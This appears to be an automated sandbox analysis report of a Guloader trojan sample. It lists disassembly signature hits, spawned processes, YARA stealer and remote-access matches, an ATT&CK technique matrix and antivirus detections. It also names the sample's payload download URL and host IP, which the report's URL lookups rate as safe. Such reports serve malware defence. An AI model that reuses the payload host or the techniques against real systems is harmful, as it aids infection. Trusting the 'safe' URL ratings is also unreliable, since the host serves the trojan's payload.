      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E9148 mov eax, dword ptr fs:[00000030h]6_2_378E9148
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C5152 mov eax, dword ptr fs:[00000030h]6_2_379C5152
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37983140 mov eax, dword ptr fs:[00000030h]6_2_37983140
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37983140 mov eax, dword ptr fs:[00000030h]6_2_37983140
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37983140 mov eax, dword ptr fs:[00000030h]6_2_37983140
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F7152 mov eax, dword ptr fs:[00000030h]6_2_378F7152
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37989179 mov eax, dword ptr fs:[00000030h]6_2_37989179
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF172 mov eax, dword ptr fs:[00000030h]6_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791D090 mov eax, dword ptr fs:[00000030h]6_2_3791D090
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791D090 mov eax, dword ptr fs:[00000030h]6_2_3791D090
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378ED08D mov eax, dword ptr fs:[00000030h]6_2_378ED08D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792909C mov eax, dword ptr fs:[00000030h]6_2_3792909C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797D080 mov eax, dword ptr fs:[00000030h]6_2_3797D080
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797D080 mov eax, dword ptr fs:[00000030h]6_2_3797D080
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F5096 mov eax, dword ptr fs:[00000030h]6_2_378F5096
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C50D9 mov eax, dword ptr fs:[00000030h]6_2_379C50D9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379190DB mov eax, dword ptr fs:[00000030h]6_2_379190DB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov ecx, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov ecx, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov ecx, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov ecx, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C0 mov eax, dword ptr fs:[00000030h]6_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3796D0C0 mov eax, dword ptr fs:[00000030h]6_2_3796D0C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3796D0C0 mov eax, dword ptr fs:[00000030h]6_2_3796D0C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379150E4 mov eax, dword ptr fs:[00000030h]6_2_379150E4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379150E4 mov ecx, dword ptr fs:[00000030h]6_2_379150E4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B903E mov eax, dword ptr fs:[00000030h]6_2_379B903E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B903E mov eax, dword ptr fs:[00000030h]6_2_379B903E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B903E mov eax, dword ptr fs:[00000030h]6_2_379B903E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B903E mov eax, dword ptr fs:[00000030h]6_2_379B903E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791B052 mov eax, dword ptr fs:[00000030h]6_2_3791B052
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799705E mov ebx, dword ptr fs:[00000030h]6_2_3799705E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799705E mov eax, dword ptr fs:[00000030h]6_2_3799705E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov ecx, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901070 mov eax, dword ptr fs:[00000030h]6_2_37901070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3796D070 mov ecx, dword ptr fs:[00000030h]6_2_3796D070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797106E mov eax, dword ptr fs:[00000030h]6_2_3797106E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C5060 mov eax, dword ptr fs:[00000030h]6_2_379C5060
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov ecx, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov ecx, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov eax, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov ecx, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov ecx, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov eax, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov ecx, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov ecx, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov eax, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov ecx, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov ecx, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F92 mov eax, dword ptr fs:[00000030h]6_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37993F90 mov eax, dword ptr fs:[00000030h]6_2_37993F90
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37993F90 mov eax, dword ptr fs:[00000030h]6_2_37993F90
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EFF90 mov edi, dword ptr fs:[00000030h]6_2_378EFF90
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792BFB0 mov eax, dword ptr fs:[00000030h]6_2_3792BFB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37931FB8 mov eax, dword ptr fs:[00000030h]6_2_37931FB8
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37973FD7 mov eax, dword ptr fs:[00000030h]6_2_37973FD7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F3FC2 mov eax, dword ptr fs:[00000030h]6_2_378F3FC2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379ABFC0 mov ecx, dword ptr fs:[00000030h]6_2_379ABFC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379ABFC0 mov eax, dword ptr fs:[00000030h]6_2_379ABFC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EBFD0 mov eax, dword ptr fs:[00000030h]6_2_378EBFD0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37921FCD mov eax, dword ptr fs:[00000030h]6_2_37921FCD
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37921FCD mov eax, dword ptr fs:[00000030h]6_2_37921FCD
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37921FCD mov eax, dword ptr fs:[00000030h]6_2_37921FCD
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792BFEC mov eax, dword ptr fs:[00000030h]6_2_3792BFEC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792BFEC mov eax, dword ptr fs:[00000030h]6_2_3792BFEC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792BFEC mov eax, dword ptr fs:[00000030h]6_2_3792BFEC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37971F13 mov eax, dword ptr fs:[00000030h]6_2_37971F13
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797DF10 mov eax, dword ptr fs:[00000030h]6_2_3797DF10
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37997F3E mov eax, dword ptr fs:[00000030h]6_2_37997F3E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379ADF2F mov eax, dword ptr fs:[00000030h]6_2_379ADF2F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37927F51 mov eax, dword ptr fs:[00000030h]6_2_37927F51
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3796FF42 mov eax, dword ptr fs:[00000030h]6_2_3796FF42
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F1F50 mov eax, dword ptr fs:[00000030h]6_2_378F1F50
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791BF60 mov eax, dword ptr fs:[00000030h]6_2_3791BF60
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797DE9B mov eax, dword ptr fs:[00000030h]6_2_3797DE9B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F7E96 mov eax, dword ptr fs:[00000030h]6_2_378F7E96
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37923E8F mov eax, dword ptr fs:[00000030h]6_2_37923E8F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799DEB0 mov eax, dword ptr fs:[00000030h]6_2_3799DEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799DEB0 mov ecx, dword ptr fs:[00000030h]6_2_3799DEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799DEB0 mov eax, dword ptr fs:[00000030h]6_2_3799DEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799DEB0 mov eax, dword ptr fs:[00000030h]6_2_3799DEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799DEB0 mov eax, dword ptr fs:[00000030h]6_2_3799DEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379ADEB0 mov eax, dword ptr fs:[00000030h]6_2_379ADEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EDEA5 mov eax, dword ptr fs:[00000030h]6_2_378EDEA5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EDEA5 mov ecx, dword ptr fs:[00000030h]6_2_378EDEA5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EFEA0 mov eax, dword ptr fs:[00000030h]6_2_378EFEA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797DEAA mov eax, dword ptr fs:[00000030h]6_2_3797DEAA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A9EDF mov eax, dword ptr fs:[00000030h]6_2_379A9EDF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A9EDF mov eax, dword ptr fs:[00000030h]6_2_379A9EDF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EBEC0 mov eax, dword ptr fs:[00000030h]6_2_378EBEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EBEC0 mov eax, dword ptr fs:[00000030h]6_2_378EBEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FBEC0 mov eax, dword ptr fs:[00000030h]6_2_378FBEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FBEC0 mov eax, dword ptr fs:[00000030h]6_2_378FBEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FBEC0 mov eax, dword ptr fs:[00000030h]6_2_378FBEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FBEC0 mov eax, dword ptr fs:[00000030h]6_2_378FBEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FBEC0 mov eax, dword ptr fs:[00000030h]6_2_378FBEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FBEC0 mov eax, dword ptr fs:[00000030h]6_2_378FBEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FBEC0 mov eax, dword ptr fs:[00000030h]6_2_378FBEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FBEC0 mov eax, dword ptr fs:[00000030h]6_2_378FBEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791FEC0 mov eax, dword ptr fs:[00000030h]6_2_3791FEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797FEC5 mov eax, dword ptr fs:[00000030h]6_2_3797FEC5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F3EE1 mov eax, dword ptr fs:[00000030h]6_2_378F3EE1
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37923EEB mov ecx, dword ptr fs:[00000030h]6_2_37923EEB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37923EEB mov eax, dword ptr fs:[00000030h]6_2_37923EEB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37923EEB mov eax, dword ptr fs:[00000030h]6_2_37923EEB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F3EF4 mov eax, dword ptr fs:[00000030h]6_2_378F3EF4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F3EF4 mov eax, dword ptr fs:[00000030h]6_2_378F3EF4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F3EF4 mov eax, dword ptr fs:[00000030h]6_2_378F3EF4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BBEE6 mov eax, dword ptr fs:[00000030h]6_2_379BBEE6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BBEE6 mov eax, dword ptr fs:[00000030h]6_2_379BBEE6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BBEE6 mov eax, dword ptr fs:[00000030h]6_2_379BBEE6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BBEE6 mov eax, dword ptr fs:[00000030h]6_2_379BBEE6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792BE17 mov eax, dword ptr fs:[00000030h]6_2_3792BE17
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EDE10 mov eax, dword ptr fs:[00000030h]6_2_378EDE10
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790DE2D mov eax, dword ptr fs:[00000030h]6_2_3790DE2D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790DE2D mov eax, dword ptr fs:[00000030h]6_2_3790DE2D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790DE2D mov eax, dword ptr fs:[00000030h]6_2_3790DE2D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F1E30 mov eax, dword ptr fs:[00000030h]6_2_378F1E30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F1E30 mov eax, dword ptr fs:[00000030h]6_2_378F1E30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792BE51 mov eax, dword ptr fs:[00000030h]6_2_3792BE51
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792BE51 mov eax, dword ptr fs:[00000030h]6_2_3792BE51
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37999E56 mov ecx, dword ptr fs:[00000030h]6_2_37999E56
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37905E40 mov eax, dword ptr fs:[00000030h]6_2_37905E40
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379ADE46 mov eax, dword ptr fs:[00000030h]6_2_379ADE46
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EBE78 mov ecx, dword ptr fs:[00000030h]6_2_378EBE78
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess created: C:\Users\user\Desktop\0GuwV0t2UU.exe "C:\Users\user\Desktop\0GuwV0t2UU.exe"Jump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000006.00000002.3534624470.0000000000060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000006.00000002.3534624470.0000000000060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping211
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager2
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS23
      System Information Discovery
      Distributed Component Object ModelInput Capture3
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      0GuwV0t2UU.exe58%ReversingLabsWin32.Trojan.Guloader
      0GuwV0t2UU.exe100%AviraHEUR/AGEN.1336713
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://alfacen.com/escDKcLKdKFF2.bin0%Avira URL Cloudsafe
      https://alfacen.com/0%Avira URL Cloudsafe
      https://alfacen.com/&K0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      alfacen.com
      193.107.36.30
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://alfacen.com/escDKcLKdKFF2.binfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0GuwV0t2UU.exe, 00000006.00000001.3135162309.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
          high
          http://www.ftp.ftp://ftp.gopher.0GuwV0t2UU.exe, 00000006.00000001.3135162309.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
            high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0GuwV0t2UU.exe, 00000006.00000001.3135162309.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
              high
